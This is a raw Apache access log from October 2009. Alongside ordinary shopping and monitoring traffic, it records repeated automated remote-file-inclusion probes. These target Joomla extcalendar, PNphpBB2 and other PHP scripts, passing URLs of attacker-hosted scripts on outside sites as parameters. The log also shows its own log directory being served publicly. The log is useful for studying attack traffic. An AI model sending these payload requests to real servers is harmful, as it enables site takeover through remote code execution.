125.251.147.194 - - [13/Oct/2009:01:40:36 -0400] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:40:44 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:40:44 -0400] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:40:44 -0400] "GET /logs/access_log.Q109063000%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:40:45 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:40:45 -0400] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:40:45 -0400] "GET /logs/access_log.Q109063000%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:40:47 -0400] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:40:47 -0400] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:40:47 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:40:48 -0400] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:40:48 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:40:48 -0400] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:01:40:49 -0400] "GET /logs/access_log.Q109072200//setup.php?dir=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:01:40:52 -0400] "GET /logs/access_log.Q109072500//setup.php?dir=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:40:54 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:40:54 -0400] "GET /logs/access_log.Q109063000%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:40:54 -0400] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:41:10 -0400] "GET /logs/access_log.Q109082500/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:41:13 -0400] "GET /logs/access_log.Q109082500/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.124.127.164 - - [13/Oct/2009:01:41:17 -0400] "GET /logs/access_log.Q109072500//setup.php?dir=http://yaeil.ac.kr/dboard/files/id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:01:42:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
64.150.183.219 - - [13/Oct/2009:01:42:17 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:42:17 -0400] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:42:17 -0400] "GET /logs/access_log.Q109081000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:42:17 -0400] "GET /logs/access_log.Q109090800//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:42:24 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:42:24 -0400] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:42:24 -0400] "GET /logs/access_log.Q109081000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:42:25 -0400] "GET /logs/access_log.Q109090800//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:42:31 -0400] "GET /logs/access_log.Q109081000%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
64.150.183.219 - - [13/Oct/2009:01:42:33 -0400] "GET /logs/access_log.Q109081000%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:42:39 -0400] "GET /logs/access_log.Q109081000%20%20//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
76.124.28.60 - - [13/Oct/2009:01:42:56 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L010C5C432D992700F67803E+M37+ENG HTTP/1.1" 200 60627 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010C5C4A26C98700E81803E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:43:22 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C5E431D292200FD5800E+M37+ENG HTTP/1.1" 200 46512 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L010C5C432D992700F67803E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
218.38.243.71 - - [13/Oct/2009:01:43:26 -0400] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:43:32 -0400] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:43:32 -0400] "GET /logs//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:43:32 -0400] "GET /logs/access_log.Q109081000//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:43:34 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:43:36 -0400] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
125.251.147.194 - - [13/Oct/2009:01:43:36 -0400] "GET /logs/access_log.Q109090800//components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:43:42 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:43:45 -0400] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
76.124.28.60 - - [13/Oct/2009:01:43:45 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C5F4B1709B20000A800E+M37+ENG HTTP/1.1" 200 46511 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5E431D292200FD5800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:43:51 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C5F411569320020B800E+M37+ENG HTTP/1.1" 200 77217 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F4B1709B20000A800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:43:57 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C5F47186922002AC800E+M37+ENG HTTP/1.1" 200 46511 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F411569320020B800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
218.38.243.71 - - [13/Oct/2009:01:44:04 -0400] "GET /logs/access_log.Q109082500/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
76.124.28.60 - - [13/Oct/2009:01:44:07 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C5F4C1D79D200215800E+M37+ENG HTTP/1.1" 200 46524 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F47186922002AC800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
72.30.78.234 - - [13/Oct/2009:01:44:08 -0400] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.243.71 - - [13/Oct/2009:01:44:18 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.30.78.234 - - [13/Oct/2009:01:44:08 -0400] "GET /logs/error_log.Q109060300 HTTP/1.0" 200 1893815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.78.234 - - [13/Oct/2009:01:44:15 -0400] "GET /logs/error_log.Q109060300 HTTP/1.0" 200 1893815 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
218.38.243.71 - - [13/Oct/2009:01:45:20 -0400] "GET /logs/access_log.Q109051700/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:45:20 -0400] "GET /logs/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:45:30 -0400] "GET /errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:45:30 -0400] "GET /logs/access_log.Q109082500/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:46:09 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:46:09 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:46:09 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:46:15 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:46:15 -0400] "GET /logs/access_log.Q109061900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:46:15 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
218.38.243.71 - - [13/Oct/2009:01:46:21 -0400] "GET /logs/access_log.Q109082500/errors.php?error=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:01:47:05 -0400] "GET //include/mail.inc.php?skin_board_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:01:47:05 -0400] "GET /logs//include/mail.inc.php?skin_board_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
203.229.58.122 - - [13/Oct/2009:01:47:05 -0400] "GET /logs/access_log.Q109081300//include/mail.inc.php?skin_board_path=http://koreaadsl.co.kr/.../id1.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
209.59.12.99 - - [13/Oct/2009:01:47:07 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.11.145.8 - - [13/Oct/2009:01:47:32 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:47:32 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:47:32 -0400] "GET /logs/access_log.Q109082100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:48:14 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:48:14 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
72.11.145.8 - - [13/Oct/2009:01:48:14 -0400] "GET /logs/access_log.Q109082100%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
76.124.28.60 - - [13/Oct/2009:01:48:22 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F4C1D79D200215800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:23 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:23 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
72.11.145.8 - - [13/Oct/2009:01:48:23 -0400] "GET /logs/access_log.Q109061900%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sports.wisegiga.net/ainul/AinuLid1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
76.124.28.60 - - [13/Oct/2009:01:48:23 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:23 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:38 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F4C1D79D200215800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:38 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F4C1D79D200215800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:39 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F4C1D79D200215800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:40 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG HTTP/1.1" 200 77221 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F4C1D79D200215800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:42 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:42 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:42 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:42 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:42 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:42 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:42 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:42 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:42 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:42 -0400] "GET /images/blend.jpg HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:42 -0400] "GET /images/cat_dot.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:43 -0400] "GET /images/cat_link.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:43 -0400] "GET /images/cat_expand.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:43 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:43 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:43 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
